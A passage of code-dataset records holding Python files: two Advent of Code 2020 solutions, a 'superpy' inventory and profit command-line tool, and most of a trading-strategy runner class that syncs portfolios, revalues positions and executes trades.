slopes)\n\n\ndef main():\n d = open('../inputs/03').read().splitlines()\n slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n print(part_1(d, slopes[1]))\n print(part_2(d, slopes))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stereoabuse/Advent-of-Code-2020","sub_path":"solutions/day_03.py","file_name":"day_03.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34200227642","text":"from utils import timed\n\n# day 7 part 2 was a nightmare, just like last year's...\n\nwith open('inputs/2020-07.txt') as f:\n input_lines = f.read().splitlines()\n\ndef find_parent_bags(rules, color):\n possible_parent_bags = []\n for outer_bag, inner_bags in rules.items():\n if color in inner_bags.keys():\n possible_parent_bags.append(outer_bag)\n\n return possible_parent_bags + sum([find_parent_bags(rules, outer_bag) for outer_bag in possible_parent_bags], [])\n\n@timed\ndef part_one(input_lines):\n rules = {}\n for rule in input_lines:\n child_bags = ' '.join(rule.split(' ')[4:]).split(', ')\n outer_bag = ' '.join(rule.split(' ')[:2])\n child_bags_dict = {}\n for bag in child_bags:\n split_bag = bag.split(' ')\n if split_bag[0] == 'no':\n break\n child_bags_dict[' '.join(split_bag[1:3]).strip('.')] = int(split_bag[0])\n rules[outer_bag] = child_bags_dict\n\n return rules, len(set(find_parent_bags(rules, 'shiny gold')))\n\ndef product(array: list) -> int:\n res = 1\n for i in array:\n res *= i\n return res\n\ndef get_num_child_bags(rules, color, parent_bags_numlist):\n if len(rules[color]) == 0:\n return 0 # no more layers left, no more additional bags to add\n\n total_bag_counts = []\n for bag, count in rules[color].items():\n branch_count_list = parent_bags_numlist.copy() # duplicate the count list for the current branch\n current_layer_sum = count * product(branch_count_list)\n\n branch_count_list.append(count) # add this layer's count to the parent numlist for future layers\n future_layer_sum = get_num_child_bags(rules, bag, branch_count_list)\n total_bag_counts.append(current_layer_sum + future_layer_sum)\n\n return sum(total_bag_counts)\n\n@timed\ndef part_two(rules):\n return get_num_child_bags(rules, 'shiny gold', [1])\n\n\nrules, answer = part_one(input_lines)\nprint(answer)\nprint(part_two(rules))\n","repo_name":"SharpBit/adventofcode","sub_path":"2020/2020-07.py","file_name":"2020-07.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16471209510","text":"import argparse\n\n\n# Do not change these lines.\n__winc_id__ = \"a2bc36ea784242e4989deb157d527ba0\"\n__human_name__ = \"superpy\"\n\n\n# Your code below this line.\n\n\ndef main():\n from helpers import today, yesterday, advance_today, products, stock, revenue, profit, buy, sell, valid_month, valid_date, lowercase\n\n parser = argparse.ArgumentParser(\n usage=\"python %(prog)s\", epilog=\"For subcommand help, enter 'python super.py -h'.\")\n subparsers = parser.add_subparsers(\n title=\"subcommands\", prog=\"python super.py\", dest=\"subcommand\")\n\n parser_today = subparsers.add_parser(\n \"today\", description=\"shows today's date and exit\", help=\"shows today's date and exit\")\n parser_today.set_defaults(func=today)\n\n parser_yesterday = subparsers.add_parser(\n \"yesterday\", description=\"shows yesterday's date and exit\", help=\"shows yesterday's date and exit\")\n parser_yesterday.set_defaults(func=yesterday)\n\n parser_advance_today = subparsers.add_parser(\n \"advance_today\", description=\"advance 'today' with n days and exit\", help=\"advance 'today' with n days and exit\")\n parser_advance_today.add_argument(\"days\", type=int, help=\"number of days\")\n parser_advance_today.set_defaults(func=advance_today)\n\n parser_products = subparsers.add_parser(\n \"products\", description=\"shows the offered products and exit\", help=\"shows the offered products and exit\")\n parser_products.add_argument(\n \"-csv\", action=\"store_const\", const=\"products.csv\", help=\"export the offered products to products.csv\")\n parser_products.add_argument(\n \"-excel\", action=\"store_const\", const=\"products.xlsx\", help=\"export the offered products to products.xlsx\")\n parser_products.set_defaults(func=products)\n\n parser_stock = subparsers.add_parser(\n \"stock\", description=\"shows the current stock and exit\", help=\"shows the current stock and exit\")\n parser_stock.add_argument(\n \"-csv\", action=\"store_const\", const=\"stock.csv\", help=\"export the current stock to stock.csv\")\n parser_stock.add_argument(\n \"-excel\", action=\"store_const\", const=\"stock.xlsx\", help=\"export the current stock to stock.xlsx\")\n parser_stock.set_defaults(func=stock)\n\n parser_revenue = subparsers.add_parser(\n \"revenue\", description=\"shows the revenue for period x and exit\", help=\"shows the revenue for period x and exit\")\n parser_revenue.add_argument(\n \"-today\", action=\"store_const\", const=\"today\", help=\"shows today's revenue\")\n parser_revenue.add_argument(\n \"-yesterday\", action=\"store_const\", const=\"yesterday\", help=\"shows yesterday's revenue\")\n parser_revenue.add_argument(\n \"-month\", type=valid_month,\n help=\"shows revenue of a month - e.g. JAN-2023\")\n parser_revenue.set_defaults(func=revenue)\n\n parser_profit = subparsers.add_parser(\n \"profit\", description=\"shows the profit for period x and exit\", help=\"shows the profit for period x and exit\")\n parser_profit.add_argument(\n \"-today\", action=\"store_const\", const=\"today\", help=\"shows today's profit\")\n parser_profit.add_argument(\n \"-yesterday\", action=\"store_const\", const=\"yesterday\", help=\"shows yesterday's profit\")\n parser_profit.add_argument(\n \"-month\", type=valid_month,\n help=\"shows profit of a month - e.g. JAN-2023\")\n parser_profit.set_defaults(func=profit)\n\n parser_buy = subparsers.add_parser(\n \"buy\", description=\"record a purchase in bought.csv and exit\", help=\"record a purchase in bought.csv and exit\")\n parser_buy.add_argument(\"product\", type=lowercase,\n help=\"product name - singular noun\")\n parser_buy.add_argument(\"date\", type=valid_date,\n help=\"purchase date - YYYY-MM-DD\")\n parser_buy.add_argument(\"price\", type=float,\n help=\"purchase price - floating point number\")\n parser_buy.add_argument(\"expiration\", type=valid_date,\n help=\"expiration date - YYYY-MM-DD\")\n parser_buy.add_argument(\"count\", type=int, help=\"product count - integer\")\n parser_buy.set_defaults(func=buy)\n\n parser_sell = subparsers.add_parser(\n \"sell\", description=\"record a sale in sold.csv and exit\", help=\"record a sale in sold.csv and exit\")\n parser_sell.add_argument(\"product\", type=lowercase,\n help=\"product name - singular noun\")\n parser_sell.add_argument(\"date\", type=valid_date,\n help=\"sale date - YYYY-MM-DD\")\n parser_sell.add_argument(\"price\", type=float,\n help=\"sale price - floating point number\")\n parser_sell.add_argument(\"count\", type=int, help=\"product count - integer\")\n parser_sell.set_defaults(func=sell)\n\n\n args = parser.parse_args()\n if args.subcommand is None:\n parser.print_help()\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RomuloPy/WincAcademy-repo","sub_path":"Back-end/superpy/super.py","file_name":"super.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27057605053","text":"\"\"\"Strategy execution core.\n\nDefine the runner model for different strategy types.\n\"\"\"\n\nimport abc\nimport datetime\nimport time\nfrom contextlib import AbstractContextManager\nimport logging\nfrom io import StringIO\nfrom pprint import pformat\nfrom types import NoneType\n\nfrom typing import List, Optional, Tuple\n\nfrom tradeexecutor.state.types import BlockNumber\nfrom tradeexecutor.statistics.core import update_statistics\nfrom tradeexecutor.strategy.account_correction import check_accounts, UnexpectedAccountingCorrectionIssue\nfrom tradeexecutor.strategy.approval import ApprovalModel\nfrom tradeexecutor.strategy.cycle import CycleDuration\nfrom tradeexecutor.strategy.engine_version import TradingStrategyEngineVersion\nfrom tradeexecutor.strategy.execution_context import ExecutionContext\nfrom tradeexecutor.strategy.execution_model import ExecutionModel\nfrom tradeexecutor.strategy.sync_model import SyncMethodV0, SyncModel\nfrom tradeexecutor.strategy.run_state import RunState\nfrom tradeexecutor.strategy.output import output_positions, DISCORD_BREAK_CHAR, output_trades\nfrom tradeexecutor.strategy.pandas_trader.position_manager import PositionManager\nfrom tradeexecutor.strategy.pricing_model import PricingModelFactory, PricingModel\nfrom tradeexecutor.strategy.routing import RoutingModel, RoutingState\nfrom tradeexecutor.strategy.stop_loss import check_position_triggers\nfrom tradeexecutor.strategy.trading_strategy_universe import TradingStrategyUniverse\nfrom tradeexecutor.strategy.universe_model import StrategyExecutionUniverse\n\nfrom tradeexecutor.state.state import State\nfrom tradeexecutor.state.position import TradingPosition\nfrom tradeexecutor.state.trade import TradeExecution\nfrom tradeexecutor.state.reserve import ReservePosition\nfrom tradeexecutor.strategy.valuation import ValuationModelFactory, ValuationModel, revalue_state\n\nlogger = logging.getLogger(__name__)\n\n\nclass PreflightCheckFailed(Exception):\n \"\"\"Something was wrong with the datafeeds.\"\"\"\n\n\nclass StrategyRunner(abc.ABC):\n \"\"\"A base class for a strategy executor.\n\n Each different strategy type needs its own runner.\n Currently we have\n\n - :py:class:`tradeexecutor.strategy.pandas_trader.runner.PandasTraderRunner`\n\n - :py:class:`tradeexecutor.strategy.qstrader.runner.QSTraderRunner`\n\n TODO: Make user_supplied_routing_model non-optional after eliminating legacy code.\n \"\"\"\n\n def __init__(self,\n timed_task_context_manager: AbstractContextManager,\n execution_model: ExecutionModel,\n approval_model: ApprovalModel,\n valuation_model_factory: ValuationModelFactory,\n sync_model: Optional[SyncModel],\n pricing_model_factory: PricingModelFactory,\n execution_context: ExecutionContext,\n routing_model: Optional[RoutingModel] = None,\n run_state: Optional[RunState] = None,\n accounting_checks=False,\n unit_testing=False,\n trade_settle_wait=None,\n ):\n \"\"\"\n :param engine_version:\n Strategy execution version.\n\n Changes function arguments based on this.\n See `StrategyModuleInformation.trading_strategy_engine_version`.\n \"\"\"\n assert isinstance(execution_context, ExecutionContext)\n\n if sync_model is not None:\n assert isinstance(sync_model, SyncModel)\n\n self.timed_task_context_manager = timed_task_context_manager\n self.execution_model = execution_model\n self.approval_model = approval_model\n self.valuation_model_factory = valuation_model_factory\n self.sync_model = sync_model\n self.pricing_model_factory = pricing_model_factory\n self.routing_model = routing_model\n self.run_state = run_state\n self.execution_context = execution_context\n self.accounting_checks = accounting_checks\n self.unit_testing = unit_testing\n\n # We need 60 seconds wait to read balances\n # after trades only on a real trading,\n # Anvil and test nodes are immune for this AFAIK\n if unit_testing or not execution_context.mode.is_live_trading():\n self.trade_settle_wait = datetime.timedelta(0)\n else:\n self.trade_settle_wait = datetime.timedelta(seconds=60)\n\n logger.info(\n \"Created strategy runner %s, engine version %s, running mode %s\",\n self,\n self.execution_context.engine_version,\n self.execution_context.mode.name,\n )\n\n # If planned and executed price is % off then\n # make a warning in the post execution output\n self.execution_warning_tolerance = 0.01\n\n def __repr__(self):\n \"\"\"Get a long presentation of internal runner state.\"\"\"\n dump = pformat(self.__dict__)\n return f\"<{self.__class__.__name__}\\n\" \\\n f\"{dump}\\n\" \\\n f\">\"\n\n @abc.abstractmethod\n def pretick_check(self, ts: datetime.datetime, universe: StrategyExecutionUniverse):\n \"\"\"Check the universe for good data before a strategy tick is executed.\n\n If there are data errors, then log and abort with helpful error messages.\n\n Only relevant for live trading; if backtesting data fails\n it can be diagnosed in the backtesting itself.\n\n :param client: Trading Strategy client to check server versions etc.\n\n :param universe: THe currently constructed universe\n\n :param ts: Real-time clock signal or past clock timestamp in the case of unit testing\n\n :raise PreflightCheckFailed: In the case we cannot go live\n \"\"\"\n pass\n\n def is_progress_report_needed(self) -> bool:\n \"\"\"Do we log the strategy steps to logger?\n\n - Disabled for backtesting to speed up\n\n - Can be enabled by hacking this function if backtesting needs debugging\n \"\"\"\n return self.execution_context.mode.is_live_trading() or self.execution_context.mode.is_unit_testing()\n\n def sync_portfolio(\n self,\n strategy_cycle_or_trigger_check_ts: datetime.datetime,\n universe: StrategyExecutionUniverse,\n state: State,\n debug_details: dict,\n end_block: BlockNumber | NoneType = None,\n ):\n \"\"\"Adjust portfolio balances based on the external events.\n\n External events include\n\n - Deposits\n\n - Withdrawals\n\n - Interest accrued\n\n - Token rebases\n\n :param strategy_cycle_or_trigger_check_ts:\n Timestamp for the event trigger\n\n :param universe:\n Loaded universe\n\n :param state:\n Currnet strategy state\n\n :param end_block:\n Sync until this block.\n\n If not given sync to the lateshish.\n\n :param debug_details:\n Dictionary of debug data that will be passed down to the callers\n\n \"\"\"\n assert isinstance(universe, StrategyExecutionUniverse), f\"Universe was {universe}\"\n reserve_assets = list(universe.reserve_assets)\n assert len(reserve_assets) > 0, \"No reserve assets available\"\n assert len(reserve_assets) == 1, f\"We only support strategies with a single reserve asset, got {self.reserve_assets}\"\n token = reserve_assets[0]\n assert token.decimals and token.decimals > 0, f\"Reserve asset lacked decimals\"\n\n logger.info(\"sync_portfolio() starting at block %s\", end_block)\n\n balance_update_events = self.sync_model.sync_treasury(\n strategy_cycle_or_trigger_check_ts,\n state,\n supported_reserves=reserve_assets,\n end_block=end_block,\n )\n assert type(balance_update_events) == list\n logger.info(\"Received %d balance update events from the sync\", len(balance_update_events))\n for e in balance_update_events:\n logger.trade(\"Funding flow event: %s\", e)\n\n # Update the debug data for tests with our events\n debug_details[\"reserve_update_events\"] = balance_update_events\n debug_details[\"total_equity_at_start\"] = state.portfolio.get_total_equity()\n debug_details[\"total_cash_at_start\"] = state.portfolio.get_cash()\n\n # If we have any new deposits, let's refresh our stats right away\n # to reflect the new balances\n if len(balance_update_events) > 0:\n\n with self.timed_task_context_manager(\"sync_portfolio_stats_refresh\"):\n routing_state, pricing_model, valuation_model = self.setup_routing(universe)\n\n timestamp = strategy_cycle_or_trigger_check_ts\n\n # Re-value the portfolio with new deposits\n self.revalue_state(\n timestamp,\n state,\n valuation_model,\n )\n\n update_statistics(\n timestamp,\n state.stats,\n state.portfolio,\n self.execution_context.mode,\n strategy_cycle_or_wall_clock=timestamp,\n )\n\n def revalue_state(self, ts: datetime.datetime, state: State, valuation_model: ValuationModel):\n \"\"\"Revalue portfolio based on the latest prices.\"\"\"\n revalue_state(state, ts, valuation_model)\n logger.info(\"After revaluation at %s our portfolio value is %f USD\", ts, state.portfolio.get_total_equity())\n\n def collect_post_execution_data(\n self,\n execution_context: ExecutionContext,\n pricing_model: PricingModel,\n trades: List[TradeExecution]):\n \"\"\"Collect post execution data for all trades.\n\n - Collect prices after the execution\n - Mostly matters for failed execution only, but we collect for everything\n \"\"\"\n\n # Rerun price estimations for the latest block data\n # after the trade has been executed\n for t in trades:\n\n if execution_context.mode.is_live_trading():\n ts = datetime.datetime.utcnow()\n else:\n # Backtesting does not yet have a way\n # to simulate slippage\n ts = t.strategy_cycle_at\n\n # Credit supply pairs do not have pricing ATM\n if t.pair.is_spot():\n if t.is_buy():\n t.post_execution_price_structure = pricing_model.get_buy_price(ts, t.pair, t.planned_reserve)\n else:\n t.post_execution_price_structure = pricing_model.get_sell_price(ts, t.pair, -t.planned_quantity)\n elif t.pair.is_leverage() and t.is_short():\n spot_pair = t.pair.underlying_spot_pair\n if t.is_sell():\n t.post_execution_price_structure = pricing_model.get_buy_price(ts, spot_pair, t.planned_collateral_consumption)\n else:\n t.post_execution_price_structure = pricing_model.get_sell_price(ts, spot_pair, t.planned_quantity)\n\n #\n # Check if we got so bad trade execution we should worry about it\n #\n\n if t.planned_reserve and t.executed_reserve:\n reserve_drift = abs((t.executed_reserve - t.planned_reserve) / t.planned_reserve)\n else:\n reserve_drift = 0\n\n if t.planned_quantity and t.executed_quantity:\n quantity_drift = abs((t.executed_quantity - t.planned_quantity) / t.planned_quantity)\n else:\n quantity_drift = 0\n\n if reserve_drift >= self.execution_warning_tolerance or quantity_drift >= self.execution_warning_tolerance:\n log_level = logging.WARNING\n else:\n log_level = logging.INFO\n\n logger.log(\n log_level,\n \"Trade quantity and reserve match for pre an post-execution for: %s\\n Estimated reserve %s, executed reserve %s\\n Estimated quantity %s, executed quantity %s\\n Reserve drift %f %%, quantity drift %f %%\",\n t,\n t.planned_reserve,\n t.executed_reserve,\n t.planned_quantity,\n t.executed_quantity,\n reserve_drift * 100,\n quantity_drift * 100,\n )\n\n def on_clock(self,\n clock: datetime.datetime,\n universe: StrategyExecutionUniverse,\n pricing_model: PricingModel,\n state: State,\n debug_details: dict) -> List[TradeExecution]:\n \"\"\"Perform the core strategy decision cycle.\n\n :param clock:\n The current cycle timestamp\n\n :param universe:\n Our trading pairs and such. Refreshed before the cycle.\n\n :param pricing_model:\n When constructing trades, uses pricing model to estimate the cost of a trade.\n\n :param state:\n The current trade execution and portfolio status\n\n :return:\n List of new trades to execute\n \"\"\"\n return []\n\n def report_after_sync_and_revaluation(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, debug_details: dict):\n buf = StringIO()\n portfolio = state.portfolio\n tick = debug_details.get(\"cycle\", 1)\n print(f\"Portfolio status (before rebalance), tick #{tick}\", file=buf)\n print(\"\", file=buf)\n print(f\"Total equity: ${portfolio.get_total_equity():,.2f}, in cash: ${portfolio.get_cash():,.2f}\", file=buf)\n print(f\"Life-time positions: {portfolio.next_position_id - 1}, trades: {portfolio.next_trade_id - 1}\", file=buf)\n print(DISCORD_BREAK_CHAR, file=buf)\n\n if len(portfolio.open_positions) > 0:\n print(f\"Currently open positions:\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.open_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No open positions\")\n\n if portfolio.get_frozen_position_equity() > 0:\n print(f\"Frozen positions (${portfolio.get_frozen_position_equity():,.2f}):\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.frozen_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No frozen positions\")\n\n print(\"Reserves:\", file=buf)\n print(\"\", file=buf)\n reserve: ReservePosition\n for reserve in state.portfolio.reserves.values():\n print(f\" {reserve.quantity:,.2f} {reserve.asset.token_symbol}\", file=buf)\n\n logger.trade(buf.getvalue())\n\n def report_before_execution(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, trades: List[TradeExecution], debug_details: dict):\n buf = StringIO()\n\n if len(trades) > 0:\n print(\"New trades to be executed\", file=buf)\n print(\"\", file=buf)\n position: TradingPosition\n portfolio = state.portfolio\n output_trades(trades, portfolio, buf)\n else:\n print(\"No new trades\", file=buf)\n logger.trade(buf.getvalue())\n\n def report_after_execution(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, debug_details: dict):\n buf = StringIO()\n portfolio = state.portfolio\n \n print(\"Portfolio status (after rebalance)\", file=buf)\n print(\"\", file=buf)\n print(f\"Total equity: ${portfolio.get_total_equity():,.2f}, Cash: ${portfolio.get_cash():,.2f}\", file=buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n\n if len(portfolio.open_positions) > 0:\n print(f\"Opened/open positions:\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.open_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No positions opened\")\n\n closed_positions = list(portfolio.get_positions_closed_at(clock))\n if len(closed_positions) > 0:\n print(f\"Closed positions:\", file=buf)\n output_positions(closed_positions, buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"The clock tick %s did not close any positions\", clock)\n\n print(\"Reserves:\", file=buf)\n print(\"\", file=buf)\n reserve: ReservePosition\n for reserve in state.portfolio.reserves.values():\n print(f\" {reserve.quantity:,.2f} {reserve.asset.token_symbol}\", file=buf)\n logger.trade(buf.getvalue())\n\n def report_strategy_thinking(self,\n strategy_cycle_timestamp: datetime.datetime,\n cycle: int,\n universe: TradingStrategyUniverse,\n state: State,\n trades: List[TradeExecution],\n debug_details: dict):\n \"\"\"Strategy admin helpers to understand a live running strategy.\n\n - Post latest variables\n\n - Draw the single pair strategy visualisation.\n\n :param strategy_cycle_timestamp:\n real time lock\n\n :param cycle:\n Cycle number\n\n :param universe:\n Currnet trading universe\n\n :param trades:\n Trades executed on this cycle\n\n :param state:\n Current execution state\n\n :param debug_details:\n Dict of random debug stuff\n \"\"\"\n\n def setup_routing(self, universe: StrategyExecutionUniverse) -> Tuple[RoutingState, PricingModel, ValuationModel]:\n \"\"\"Setups routing state for this cycle.\n\n :param universe:\n The currently tradeable universe\n\n :return:\n Tuple(routing state, pricing model, valuation model)\n \"\"\"\n\n assert self.routing_model, \"Routing model not set\"\n\n # Get web3 connection, hot wallet\n routing_state_details = self.execution_model.get_routing_state_details()\n\n # Initialise the current routing state with execution details\n logger.info(\"Setting up routing.\\n\"\n \"Routing model is %s\\n\"\n \"Details are %s\\n\"\n \"Universe is %s\",\n self.routing_model,\n routing_state_details,\n universe,\n )\n routing_state = self.routing_model.create_routing_state(universe, routing_state_details)\n\n # Create a pricing model for assets\n pricing_model = self.pricing_model_factory(self.execution_model, universe, self.routing_model)\n\n assert pricing_model, \"pricing_model_factory did not return a value\"\n\n # Create a valuation model for positions\n valuation_model = self.valuation_model_factory(pricing_model)\n\n logger.debug(\"setup_routing(): routing_state: %s, pricing_model: %s, valuation_model: %s\",\n routing_state,\n pricing_model,\n valuation_model\n )\n\n return routing_state, pricing_model, valuation_model\n\n def check_balances_post_execution(\n self,\n universe: StrategyExecutionUniverse,\n state: State,\n ):\n \"\"\"Check that on-chain balances matches our internal accounting after executing trades.\n\n - Crash the execution if the on-chain balance is not what we expect\n\n - Call after we have stored the execution state in the database\n \"\"\"\n\n # We cannot call account check right after the trades,\n # as meny low quality nodes might still report old token balances\n # from eth_call\n logger.info(\"Waiting on-chain balances to settle for %s before performing accounting checks\", self.trade_settle_wait)\n time.sleep(self.trade_settle_wait.total_seconds())\n\n # Double check we handled incoming trade balances correctly\n with self.timed_task_context_manager(\"check_accounts_post_trade\"):\n end_block = self.execution_model.get_safe_latest_block()\n logger.info(\"Post-trade accounts balance check for block %s\", end_block)\n self.check_accounts(universe, state, end_block=end_block)\n\n def tick(self,\n strategy_cycle_timestamp: datetime.datetime,\n universe: StrategyExecutionUniverse,\n state: State,\n debug_details: dict,\n cycle_duration: Optional[CycleDuration] = None,\n cycle: Optional[int] = None,\n ) -> dict:\n \"\"\"Execute the core functions of a strategy.\n\n TODO: This function is vulnerable to balance changes in the middle of execution.\n It's not possible to fix this until we have atomic rebalances.\n\n :param strategy_cycle_timestamp:\n Current timestamp of the execution cycle.\n\n :param universe:\n Loaded trading data\n\n :param state:\n The current state of the strategy (open position, past trades, visualisation)\n\n :param debug_details:\n Internal bunch of data used in unit testing\n\n :param cycle_duration:\n The currenct cycle duration (time between ticks).\n This may be specific in a strategy module, but also overridden for testing.\n This is used only for logging purposes.\n\n :param cycle:\n Strategy cycle number\n\n :param execution_context:\n Live or backtesting\n\n :return: Debug details dictionary where different subsystems can write their diagnostics information what is happening during the dict.\n Mostly useful for integration testing.\n \"\"\"\n\n assert isinstance(universe, StrategyExecutionUniverse)\n\n assert isinstance(strategy_cycle_timestamp, datetime.datetime)\n\n if cycle_duration not in (CycleDuration.cycle_unknown, CycleDuration.cycle_1s, None):\n assert strategy_cycle_timestamp.second == 0, f\"Cycle duration {cycle_duration}: Does not look like a cycle timestamp: {strategy_cycle_timestamp}, should be even minutes\"\n\n end_block = self.execution_model.get_safe_latest_block()\n\n logger.info(\"tick() at block %s\", end_block)\n\n friendly_cycle_duration = cycle_duration.value if cycle_duration else \"-\"\n with self.timed_task_context_manager(\"strategy_tick\", clock=strategy_cycle_timestamp, cycle_duration=friendly_cycle_duration):\n\n routing_state, pricing_model, valuation_model = self.setup_routing(universe)\n assert pricing_model, \"Routing did not provide pricing_model\"\n\n # Watch incoming deposits\n with self.timed_task_context_manager(\"sync_portfolio\"):\n self.sync_portfolio(strategy_cycle_timestamp, universe, state, debug_details, end_block)\n\n # Double check we handled deposits correctly\n with self.timed_task_context_manager(\"check_accounts_pre_trade\"):\n logger.info(\"Pre-trade accounts balance check\")\n self.check_accounts(universe, state, end_block)\n\n # Assing a new value for every existing position\n with self.timed_task_context_manager(\"revalue_portfolio\"):\n self.revalue_state(strategy_cycle_timestamp, state, valuation_model)\n\n # Log output\n if self.is_progress_report_needed():\n self.report_after_sync_and_revaluation(strategy_cycle_timestamp, universe, state, debug_details)\n\n # Check if we do have any money yo trade or not.\n # Otherwise we are going to crash with \"not enough USDC to open a trade\" errors\n execution_context = self.execution_context\n\n # TODO: Due to the legacy some tests assume they run with zero capital,\n # and we have a flag to check it for here\n if state.portfolio.has_trading_capital() or execution_context.mode.is_unit_testing():\n\n # Run the strategy cycle main trading decision cycle\n with self.timed_task_context_manager(\"decide_trades\"):\n rebalance_trades = self.on_clock(\n strategy_cycle_timestamp,\n universe,\n pricing_model,\n state,\n debug_details\n )\n assert type(rebalance_trades) == list\n debug_details[\"rebalance_trades\"] = rebalance_trades\n\n # Make some useful diagnostics output for log files to troubleshoot if something\n # when wrong internally\n _, last_point_at = state.visualisation.get_timestamp_range()\n logger.info(\"We have %d new trades, %d total visualisation points, last visualisation point at %s\",\n len(rebalance_trades),\n state.visualisation.get_total_points(),\n last_point_at\n )\n\n # Check that we did not get duplicate trades for some reason,\n # like API bugs\n trade_set = set()\n for t in rebalance_trades:\n assert t not in trade_set, f\"decide_trades() returned a duplicate trade: {t}\"\n trade_set.add(t)\n\n # Log what our strategy decided\n if self.is_progress_report_needed():\n self.report_strategy_thinking(\n strategy_cycle_timestamp=strategy_cycle_timestamp,\n cycle=cycle,\n universe=universe,\n state=state,\n trades=rebalance_trades,\n debug_details=debug_details)\n\n # Shortcut quit here if no trades are needed\n if len(rebalance_trades) == 0:\n logger.trade(\"No action taken: strategy decided not to open or close any positions\")\n return debug_details\n\n # Ask user confirmation for any trades\n with self.timed_task_context_manager(\"confirm_trades\"):\n approved_trades = self.approval_model.confirm_trades(state, rebalance_trades)\n assert type(approved_trades) == list\n logger.info(\"After approval we have %d trades left\", len(approved_trades))\n debug_details[\"approved_trades\"] = approved_trades\n\n # Log output\n if self.is_progress_report_needed():\n self.report_before_execution(strategy_cycle_timestamp, universe, state, approved_trades, debug_details)\n\n # Physically execute the trades\n with self.timed_task_context_manager(\"execute_trades\", trade_count=len(approved_trades)):\n\n # Unit tests can turn this flag to make it easier to see why trades fail\n check_balances = debug_details.get(\"check_balances\", False)\n\n # Make sure our hot wallet nonce is up to date\n self.sync_model.resync_nonce()\n\n self.execution_model.execute_trades(\n strategy_cycle_timestamp,\n state,\n approved_trades,\n self.routing_model,\n routing_state,\n check_balances=check_balances)\n\n with self.timed_task_context_manager(\"post_execution\"):\n self.collect_post_execution_data(\n self.execution_context,\n pricing_model,\n approved_trades,\n )\n\n else:\n equity = state.portfolio.get_total_equity()\n logger.trade(\"Strategy has no trading capital and trade decision step was skipped. The total equity is %f USD, execution mode is %s\", equity, execution_context.mode.name)\n\n # Log output\n if self.is_progress_report_needed():\n self.report_after_execution(strategy_cycle_timestamp, universe, state, debug_details)\n\n return debug_details\n\n def check_position_triggers(self,\n clock: datetime.datetime,\n state: State,\n universe: StrategyExecutionUniverse,\n stop_loss_pricing_model: PricingModel,\n routing_state: RoutingState,\n ) -> List[TradeExecution]:\n \"\"\"Check stop loss/take profit for positions.\n\n Unlike trade balancing in tick()\n\n - Stop loss/take profit can occur only to any existing positions.\n No new positions are opened.\n\n - Trading Universe cannot change for these triggers,\n but remains stable between main ticks.\n\n - check_position_triggers() is much more lightweight and can be called much more frequently,\n even once per minute\n\n :return:\n List of generated stop loss trades\n \"\"\"\n\n if routing_state is None:\n # Dummy executoin model\n return\n\n assert isinstance(routing_state, RoutingState)\n assert isinstance(stop_loss_pricing_model, PricingModel)\n\n debug_details = {}\n\n end_block = self.execution_model.get_safe_latest_block()\n logger.info(f\"check_position_triggers() using block %s\", end_block)\n\n with self.timed_task_context_manager(\"check_position_triggers\"):\n\n # Sync treasure before the trigger checks\n with self.timed_task_context_manager(\"sync_portfolio_before_triggers\"):\n self.check_accounts(universe, state, report_only=True, end_block=end_block)\n self.sync_portfolio(clock, universe, state, debug_details, end_block=end_block)\n\n # Check that our on-chain balances are good\n with self.timed_task_context_manager(\"check_accounts_position_triggers\"):\n logger.info(\"Position trigger pre-trade accounts balance check\")\n self.check_accounts(universe, state, end_block=end_block)\n\n # We use PositionManager.close_position()\n # to generate trades to close stop loss positions\n position_manager = PositionManager(\n clock,\n universe,\n state,\n stop_loss_pricing_model,\n )\n\n triggered_trades = check_position_triggers(position_manager)\n\n approved_trades = self.approval_model.confirm_trades(state, triggered_trades)\n\n if approved_trades:\n logger.info(\"Executing %d stop loss/take profit trades at %s\", len(approved_trades), clock)\n self.execution_model.execute_trades(\n clock,\n state,\n approved_trades,\n self.routing_model,\n routing_state,\n check_balances=False)\n\n return approved_trades\n\n def repair_state(self, state: State) -> List[TradeExecution]:\n \"\"\"Repair unclean state issues.\n\n Currently supports\n\n - Fixing unfinished trades\n\n :return:\n List of fixed trades\n \"\"\"\n\n logger.info(\"Reparing the state\")\n\n repaired = []\n repaired += self.execution_model.repair_unconfirmed_trades(state)\n return repaired\n\n def refresh_visualisations(self, state: State, universe: TradingStrategyUniverse):\n \"\"\"Update the visualisations in the run state.\n\n This will update `RunState.visualisations` for the current strategy.\n\n - In-process memory charts are served by webhook\n\n - In-process memory charts are posted to Discord, etc.\n\n - This is called on the startup, so that we have immediately good visualisation\n to show over the webhook when the web server boots up\n\n - This is called after each strategy thinking cycle is complete.\n\n The function is overridden by the child class for actual strategy runner specific implementation.\n \"\"\"\n\n def check_accounts(\n self,\n universe: TradingStrategyUniverse,\n state: State,\n report_only=False,\n end_block: BlockNumber | NoneType = None\n ):\n \"\"\"Perform extra accounting checks on live trading startup.\n\n Must be enabled in the settings. Enabled by default for live trading.\n\n :param report_only:\n Don't crash if we get problems in accounts\n\n :param end_block:\n Check specifically at this block.\n\n If not given use the lateshish block.\n\n :raise UnexpectedAccountingCorrectionIssue:\n Aborting execution.\n\n \"\"\"\n\n assert isinstance(universe, TradingStrategyUniverse)\n\n # Enzyme tests\n if len(state.portfolio.reserves) == 0:\n logger.info(\"No reserves, skipping accounting 